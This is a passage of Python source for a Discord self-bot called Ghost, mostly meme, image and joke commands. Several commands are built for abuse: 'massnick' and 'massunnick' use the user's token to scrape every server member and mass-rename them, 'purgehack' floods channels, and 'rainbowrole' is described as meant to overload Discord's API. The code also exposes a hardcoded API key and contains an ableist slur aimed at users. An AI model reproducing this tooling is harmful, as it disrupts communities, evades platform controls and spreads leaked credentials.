file1 = open('data/rickroll.txt', 'r')
Lines = file1.readlines()
for line in Lines:
if rickRollEnabled == True:
await ctx.send(line)
await asyncio.sleep(1)
else:
return
Ghost.loop.create_task(sendLyrics())
@Ghost.command(name="stoprickroll", description="Stop sending rick astley lyrics.", usage="stoprickroll")
async def stoprickroll(ctx):
global rickRollEnabled
rickRollEnabled = False
@Ghost.command(name="suggest", description="Suggest something.", usage="suggest [suggestion]")
async def suggest(ctx, *, suggestion):
if __embedmode__:
embed = discord.Embed(title="Suggestion", description=suggestion, colour=__embedcolour__)
embed.set_footer(text=ctx.author.name + " suggested.", icon_url=ctx.author.avatar_url)
embed.timestamp = datetime.now()
msg = await ctx.send(embed=embed)
else:
msg = await ctx.send(f"""```ini
[ Suggestion ]
{suggestion}
# {ctx.author.name} suggested.```""", delete_after=__deletetimeout__)
await msg.add_reaction('\U0001F44D')
await msg.add_reaction('\U0001F44E')
@Ghost.command(name="massnick", description="Change the nickname of all members in the command server.", usage="massnick [nickname]", aliases=["massnickname", "masschangenickname"])
async def massnick(ctx, *, nickname):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.edit(nick=nickname)
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="massunnick", description="Reset the nickname of all members in the command server.", usage="massunnick", aliases=["massremovenickname", "massunnickname"])
async def massunnick(ctx):
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.edit(nick="")
await asyncio.sleep(1)
except:
pass
@Ghost.command(name="dadjoke", description="A random dad joke.", usage="dadjoke", aliases=["fuckofftypefunny"])
async def dadjoke(ctx):
url = "https://icanhazdadjoke.com/"
payload={}
headers = {
'Accept': 'text/plain',
'Cookie': '__cfduid=d6dccebb48b09fdeb9a97022fa2f292811612029832'
}
response = requests.request("GET", url, headers=headers, data=payload)
if __embedmode__:
embed = discord.Embed(description=response.text, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(response.text)
@Ghost.command(name="randomquestion", description="A random question.", usage="randomquestion", aliases=["ranquestion"])
async def randomquestion(ctx):
question = requests.get("https://nekos.life/api/v2/why").json()["why"]
if __embedmode__:
embed = discord.Embed(description=question, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(question)
@Ghost.command(name="randommessage", description="A random message.", usage="randommessage", aliases=["ranmessage", "ranmsg",])
async def randommessage(ctx):
url = "https://ajith-messages.p.rapidapi.com/getMsgs"
querystring = {"category":"Random"}
headers = {
'x-rapidapi-key': "01eddf9d3cmsh5207aa226152e38p1f5a60jsn182a112b106d",
'x-rapidapi-host': "ajith-messages.p.rapidapi.com"
}
response = requests.request("GET", url, headers=headers, params=querystring)
response_data = response.json()
if __embedmode__:
embed = discord.Embed(description=response_data["Message"], colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(response_data["Message"])
@Ghost.command(name="meme", description="A random meme.", usage="meme", aliases=["randommeme", "ranmeme"])
async def meme(ctx):
response = requests.get("https://meme-api.herokuapp.com/gimme")
data = response.json()
if __embedmode__:
embed = discord.Embed(title=data["title"], url=data["postLink"], colour=__embedcolour__)
embed.set_image(url=data["url"])
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_author(name=f"u/{data['author']}", url=f"https://reddit.com/u/{data['author']}")
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(data["title"] + "\n" + data["url"])
@Ghost.command(name="gif", description="Search for a gif.", usage="gif [search]", aliases=["searchgif"])
async def gif(ctx, *, search):
if CONFIG["api_keys"]["tenor"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires a tenor API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires a tenor API key.\nVisit <https://tenor.com/developer/keyregistration> for registration")
else:
search = search.replace(" ", "+")
response = requests.get(f'https://g.tenor.com/v1/search?q={search}&key={CONFIG["api_keys"]["tenor"]}&limit=10000')
data = response.json()
#print(data['results'][0]["media"][0]["gif"]["url"])
if __embedmode__:
embed = discord.Embed(title=f"{search.replace('+', ' ')}", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data['results'][random.randint(0, 49)]["media"][0]["gif"]["url"])
await ctx.send(embed=embed)
else:
await ctx.send(data['results'][random.randint(0, 49)]["media"][0]["gif"]["url"])
@Ghost.command(name="cat", description="A random cat image.", usage="cat", aliases=["randomcat", "rancat"])
async def cat(ctx):
request = requests.get("https://cataas.com/cat?json=true").json()
image = "https://cataas.com" + request["url"]
if __embedmode__:
embed = discord.Embed(title="meow", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=image)
await ctx.send(embed=embed)
else:
await ctx.send(image)
@Ghost.command(name="catgif", description="A random cat gif.", usage="catgif", aliases=["randomcatgif", "rancatgif"])
async def catgif(ctx):
request = requests.get("https://cataas.com/cat/gif?json=true").json()
image = "https://cataas.com" + request["url"]
if __embedmode__:
embed = discord.Embed(title="meow", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=image)
await ctx.send(embed=embed)
else:
await ctx.send(image)
@Ghost.command(name="dog", description="A random dog image.", usage="dog", aliases=["randomdog", "randog"])
async def dog(ctx):
response = requests.get('https://dog.ceo/api/breeds/image/random')
data = response.json()
if __embedmode__:
embed = discord.Embed(title="woof", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data['message'])
await ctx.send(embed=embed)
else:
await ctx.send(data['message'])
@Ghost.command(name="shiba", description="A random shiba image.", usage="shiba", aliases=["randomshiba", "ranshiba"])
async def shiba(ctx):
response = requests.get('https://shibe.online/api/shibes?count=1&httpsUrls=true')
data = response.json()
if __embedmode__:
embed = discord.Embed(title="shiba", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data[0])
await ctx.send(embed=embed)
else:
await ctx.send(data[0])
@Ghost.command(name="fox", description="A random fox image. (Thanks drag#6311 for fixing it :/)", usage="fox", aliases=["randomfox", "ranfox"])
async def fox(ctx):
response = requests.get('https://randomfox.ca/floof/')
data = response.json()
if __embedmode__:
embed = discord.Embed(title="fox", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data['image'])
await ctx.send(embed=embed)
else:
await ctx.send(data['image'])
@Ghost.command(name="achievement", description="Create a fake minecraft achievement image.", usage='achievement ["text"] (icon)', aliases=["minecraftachievement", "mcachievement"])
async def achievement(ctx, text, icon=10):
icon = str(icon)
text = text.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/achievement?text={text}&icon={icon}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="challenge", description="Create a fake minecraft challenge image.", usage='challenge ["text"] (icon)', aliases=["minecraftchallenge", "mcchallenge"])
async def challenge(ctx, text, icon=33):
text = text.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/challenge?text={text}&icon={icon}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="captcha", description="Create a fake reCaptcha.", usage="captcha [text]", aliases=["fakecaptcha"])
async def captcha(ctx, *, text):
text = text.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/captcha?text={text}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="amiajoke", description="Make a user a joke.", usage="amiajoke [@user]", aliases=["amiajoketoyou"])
async def amiajoke(ctx, user:discord.User):
imageurl = avatarUrl(user.id, user.avatar)
image = requests.get(f"http://timbw.ddns.net:5000/amiajoke?image={imageurl}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="didyoumean", description="Create a google did you mean image.", usage='didyoumean ["text 1"] ["text 2"]', aliases=["googledidyoumean"])
async def didyoumean(ctx, text1="Nighty", text2="Ghost"):
text1 = text1.replace(" ", "+")
text2 = text2.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/didyoumean?top={text1}&bottom={text2}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="drake", description="Create a drake meme image.", usage='drake ["text 1"] ["text 2"]', aliases=["drakememe"])
async def drake(ctx, text1="Nighty Selfbot", text2="Ghost Selfbot"):
text1 = text1.replace(" ", "+")
text2 = text2.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/drake?top={text1}&bottom={text2}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="facts", description="Create a facts meme image.", usage='facts [text]', aliases=["factsmeme"])
async def facts(ctx, *, text):
text = text.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/facts?text={text}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="jokeoverhead", description="Create a joke over head image.", usage="jokeoverhead [image url]")
async def jokeoverhead(ctx, *, imageurl):
image = requests.get(f"http://timbw.ddns.net:5000/jokeoverhead?image={imageurl}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="pornhub", description="Create a pornhub logo image.", usage='pornhub ["text 1"] ["text 2"]', aliases=["phub"])
async def pornhub(ctx, text1="Ghost", text2="Selfbot"):
text1 = text1.replace(" ", "+")
text2 = text2.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/pornhub?text={text1}&text2={text2}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="salty", description="Make someone salty.", usage="salty [@user]")
async def jokeoverhead(ctx, user:discord.User):
imageurl = avatarUrl(user.id, user.avatar)
image = requests.get(f"http://timbw.ddns.net:5000/salty?image={imageurl}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="ship", description="Ship two people.", usage="ship [@user 1] [@user 2]")
async def ship(ctx, user1:discord.User, user2:discord.User):
user1 = avatarUrl(user1.id, user1.avatar)
user2 = avatarUrl(user2.id, user2.avatar)
image = requests.get(f"http://timbw.ddns.net:5000/ship?user={user1}&user2={user2}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="trash", description="Put someone in the trash.", usage='trash [@user]')
async def trash(ctx, user: discord.User):
trash = avatarUrl(user.id, user.avatar)
face = avatarUrl(Ghost.user.id, Ghost.user.avatar)
image = requests.get(f"http://timbw.ddns.net:5000/trash?trash={trash}&face={face}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="what", description="Make a what meme.", usage='what [image url]')
async def what(ctx, *, imageurl):
image = requests.get(f"http://timbw.ddns.net:5000/what?image={imageurl}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="minion", description="Get a minion meme with bennys api", usage='minion')
async def minion(ctx):
response = requests.get('https://api.benny.fun/v1/minion')
data = response.json()
await ctx.send(data['minion'])
@Ghost.command(name="communism", description="Turns a user into a communist with bennys api", usage='communism [@user]')
async def communism(ctx, user: discord.User):
communist = avatarUrl(user.id, user.avatar)
image = requests.get(f'https://api.benny.fun/v1/communism?image={communist}')
imageFile = open("communism.png", "wb").write(image.content)
file = discord.File("communism.png", filename="communism.png")
await ctx.send(file=file)
os.remove("communism.png")
@Ghost.command(name="bad", description="Tells a user hes bad.", usage="bad [@user]")
async def bad(ctx, user: discord.User):
bad = avatarUrl(user.id, user.avatar)
image=requests.get(f'https://api.benny.fun/v1/bad?image={bad}')
imageFile = open("bad.png", "wb").write(image.content)
file = discord.File("bad.png", filename="bad.png")
await ctx.send(file=file)
os.remove("bad.png")
@Ghost.command(name="fml", description="Sends a random persons message who hates their life", usage="fml")
async def fml(ctx):
response = requests.get('https://api.benny.fun/v1/fml')
data = response.json()
await ctx.send(f"""
```Posted by {data['author']}
FML
{data['text']}```""")
@Ghost.command(name="purgehack", description="Purge without permissions.", usage="purgehack")
async def purgehack(ctx):
await ctx.send(f"** **\n"*100)
@Ghost.command(name="iq", description="Check how smart a user is.", usage="iq [@user]", aliases=["iqcheck"])
async def iq(ctx, user: discord.User):
iq = random.randint(45, 135)
smart = ""
if user.id == 858034873415368715:
iq = 45
if iq > 90 and iq < 135:
smart = "They're very smart!"
if iq > 70 and iq < 90:
smart = "They're just below average."
if iq > 50 and iq < 70:
smart = "They might have some issues."
if iq > 40 and iq < 50:
smart = "They're severely retarded."
if __embedmode__:
embed = discord.Embed(title=f"{user.name}'s iq is `{iq}`.", description=f"{smart}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{user}'s iq is `{iq}`. {smart}")
@Ghost.command(name="howskid", description="Check the percentage of a skid.", usage="howskid [item]")
async def howskidd(ctx, *, item):
percentage = random.randint(0, 100)
if __embedmode__:
embed = discord.Embed(title="Skid Detection", description=f"{item} is {percentage}% skidded!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"`{item}` is {percentage}% skidded!")
@Ghost.command(name="halal", description="Check if a user is halal or haram.", usage="halal [@user]", aliases=["haram"])
async def halal(ctx, user: discord.User):
halalius = random.choice("halal haram".split())
if __embedmode__:
embed = discord.Embed(title="Halal or Haram?", description=f"{user.mention} is {halalius}!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{user.mention} is {halalius}!")
@Ghost.command(name="howgay", description="How gay a user is.", usage="howgay [@user]", aliases=["gaycheck"])
async def howgay(ctx, user: discord.User):
percentage = str(random.randint(15, 100)) + "%"
if __embedmode__:
embed = discord.Embed(title=f"🏳️🌈 {user.name} is {percentage} gay", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"🏳️🌈 {user} is {percentage} gay")
@Ghost.command(name="slots", description="Play the slot machine.", usage="slots", aliases=["gamble"])
async def slots(ctx):
if __embedmode__:
embed = discord.Embed(title=f"Slots", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
message = await ctx.send(embed=embed)
else:
message = await ctx.send(f"""```ini
[ Slots ]
# {__embedfooter__}
```""")
emojis = [("🍒", 0.01), ("🍊", 0.02), ("🍎", 0.06), ("💎", 0.08), ("🍆", 0.14), ("🍉", 0.24), ("🎰", 0.36)]
emojis2 = []
for emoji, probability in emojis:
emojis2 += emoji*int(probability*100)
async def game():
amount = 8
delay = 0.5
dots = "."
reel_1 = ""
reel_2 = ""
reel_3 = ""
final_reel = ""
for _ in range(amount):
delay += 0.02
dots += "."
if dots == "....":
dots = "."
reel_1 = random.choice(emojis2)
reel_2 = random.choice(emojis2)
reel_3 = random.choice(emojis2)
final_reel = reel_1 + " | " + reel_2 + " | " + reel_3
if __embedmode__:
embed = discord.Embed(title=f"Spinning{dots}", description=final_reel, color=__embedcolour__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed)
else:
await message.edit(content=f"""```ini
[ Spinning{dots} ]
{final_reel}
# {__embedfooter__}
```""")
await asyncio.sleep(delay)
if reel_1 == reel_2 and reel_1 == reel_3 and reel_2 == reel_3:
if __embedmode__:
embed = discord.Embed(title=f"You won!", description=final_reel, color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed)
else:
await message.edit(content=f"""```ini
[ You won! ]
{final_reel}
# {__embedfooter__}
```""")
else:
if __embedmode__:
embed = discord.Embed(title=f"You lost ;(", description=final_reel, color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed)
else:
await message.edit(content=f"""```ini
[ You lost ;( ]
{final_reel}
# {__embedfooter__}
```""")
await game()
@Ghost.command(name="socialcredit", description="A users social credit score.", usage="socialcredit [@user]", aliases=["socialcreditcheck"])
async def socialcredit(ctx, user: discord.User):
credit = random.randint(-5000000, 10000000)
if __embedmode__:
embed = discord.Embed(description=f"{user.name}'s social credit score is {credit}", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{user.name}'s social credit score is {credit}")
@Ghost.command(name="roast", description="Roast a user.", usage="roast [@user]", aliases=["insult"])
async def roast(ctx, user: discord.User):
insult = requests.get("https://evilinsult.com/generate_insult.php?lang=en&type=json").json()["insult"]
if __embedmode__:
embed = discord.Embed(description=insult, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(user.mention, embed=embed)
else:
await ctx.send(f"Ayo {user.mention}, " + str(insult).lower())
@Ghost.command(name="yomomma", description="Random yo momma joke.", usage="yomomma", aliases=["mom", "mum", "yomom"])
async def yomomma(ctx):
joke = requests.get("https://api.yomomma.info/").json()["joke"]
if __embedmode__:
embed = discord.Embed(description=joke, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(joke)
@Ghost.command(name="fakeedited", description='"Edit" a message.', usage="fakeedited [message]", aliases=["edited"])
async def fakeedited(ctx, *, message):
msg = await ctx.send(message)
await msg.edit(content=message + " hehe")
await msg.edit(content=message)
@Ghost.command(name="pp", description="The length of a user's penis.", usage="pp (@user)", aliases=["dicksize", "cocksize", "penissize", "predictpenileprotractedness"])
async def pp(ctx, user: discord.User = None):
size = "8" + "="*random.randint(1, 12) + "D"
if user is None:
if __embedmode__:
embed = discord.Embed(title=f"{Ghost.user.name}'s pp is {size}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{Ghost.user.name}'s pp size\n{size}")
else:
if __embedmode__:
embed = discord.Embed(title=f"{user.name}'s pp is {size}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{user.name}'s pp size\n{size}")
# @Ghost.command(name="trumptweet", description="Make Donald Trump tweet anything.", usage="trumptweet [tweet]")
# async def trumptweet(ctx, *, tweet):
# img = Image.open("trump-tweets/assets/bg.png")
# draw = ImageDraw.Draw(img)
# font = ImageFont.truetype('trump-tweets/assets/roboto.ttf', 30)
# draw.text((39, 123),f"{tweet}",(0,0,0),font=font)
# randomnum = random.randint(1000, 9999)
# img.save(f'trump-tweets/{randomnum}.png')
# file = discord.File(f'trump-tweets/{randomnum}.png')
# try:
# embed = discord.Embed(title='Trump Tweeted...', color=__embedcolour__)
# embed.set_image(url=f'attachment://{randomnum}.png')
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await ctx.send(file=file, embed=embed)
# except discord.HTTPException:
# await ctx.send(file=file)
@Ghost.command(name="rainbowrole", description="Kill Discord's API with a sexy rainbow role.", usage="rainbowrole [@role]")
async def rainbowrole(ctx, *, role: discord.Role):
oldcolour = role.color
red = Color("#ff3d3d")
pink = Color("#f54287")
rainbow = list(red.range_to(pink, 50))
if __embedmode__:
embed = discord.Embed(title=f"Rainbow Role", color=__embedcolour__, description=f"{role} now has a rainbow colour.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Rainbow Role ]
{role} now has a rainbow colour.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
for _ in range(5):
for x in rainbow:
colour = f'{x}'
await role.edit(color=int(colour.replace('#', '0x'), 0))
await role.edit(color=oldcolour)
# @Ghost.command(name="rembed", description="Kill Discord's API with a sexy rainbow embedded message.", usage="rembed [text]", aliases=["rainbowembed"])
# async def rembed(ctx, *, text):
# if __embedmode__:
# red = Color("#ff3d3d")
# pink = Color("#f54287")
# rainbow = list(red.range_to(pink, 25))
# embed = discord.Embed(color=int("#ff3d3d".replace('#', '0x'), 0))
# embed.set_author(name=text)
# msg = await ctx.send(embed=embed)
# for _ in range(5):
# for x in rainbow:
# colour = f'{x}'
# newembed = discord.Embed(color=int(colour.replace('#', '0x'), 0))
# newembed.set_author(name=text)
# await msg.edit(embed=newembed)
# await msg.edit(embed=discord.Embed(color=int("#f54287".replace("#", "0x"), 0)).set_author(name=text))
# else:
# await ctx.send("This command can only be used in embed mode.")
@Ghost.command(name="coinflip", description="Flip a coin.", usage="coinflip", aliases=["flipacoin"])
async def coinflip(ctx):
choices = ["Heads", "Tails"]
choice = random.choice(choices)
if __embedmode__:
embed = discord.Embed(title=f"{choice}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(choice)
@Ghost.command(name="dice", description="Roll a dice.", usage="dice", aliases=["rolladice"])
async def dice(ctx, amnt: int=6):
result = str(random.randint(1, amnt))
await ctx.send(f"""
:game_die: `{amnt}` sides dice
You rolled a `{result}`.""")
@Ghost.command(name="rps", description="Rock, paper, scissors.", usage="rps", aliases=["rockpaperscissors"])
async def rps(ctx, move = None):
if move is not None:
choices = ["Rock", "Paper", "Scissors"]
computer = random.choice(choices)
try:
try:
player = move
if player == computer:
e = discord.Embed(title=f'Tie!', description=f'We chose the same!', color=__embedcolour__)
elif player == 'Rock' and computer == 'Scissors':
e = discord.Embed(title=f'Player wins!', description=f'{player} smashes {computer}!', color=__embedcolour__)
elif player == 'Rock' and computer == 'Paper':
e = discord.Embed(title=f'Computer wins!', description=f'{computer} covers {player}!', color=__embedcolour__)
elif player == 'Paper' and computer == 'Rock':
e = discord.Embed(title=f'Player wins!', description=f'{player} covers {computer}!', color=__embedcolour__)
elif player == 'Paper' and computer == 'Scissors':
e = discord.Embed(title=f'Computer wins!', description=f'{computer} cuts {player}!', color=__embedcolour__)
elif player == 'Scissors' and computer == 'Paper':
e = discord.Embed(title=f'Player wins!', description=f'{player} cuts {computer}!', color=__embedcolour__)
elif player == "Scissors" and computer == 'Rock':
e = discord.Embed(title=f'Computer wins!', description=f'{computer} smashes {player}!', color=__embedcolour__)
else:
e = discord.Embed(title=f'Invalid play', description=f'Try either Rock, Paper or Scissors.', color=__embedcolour__)
e.set_thumbnail(url=__embedimage__)
e.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
e.timestamp = datetime.now()
await ctx.send(embed=e)
except IndexError:
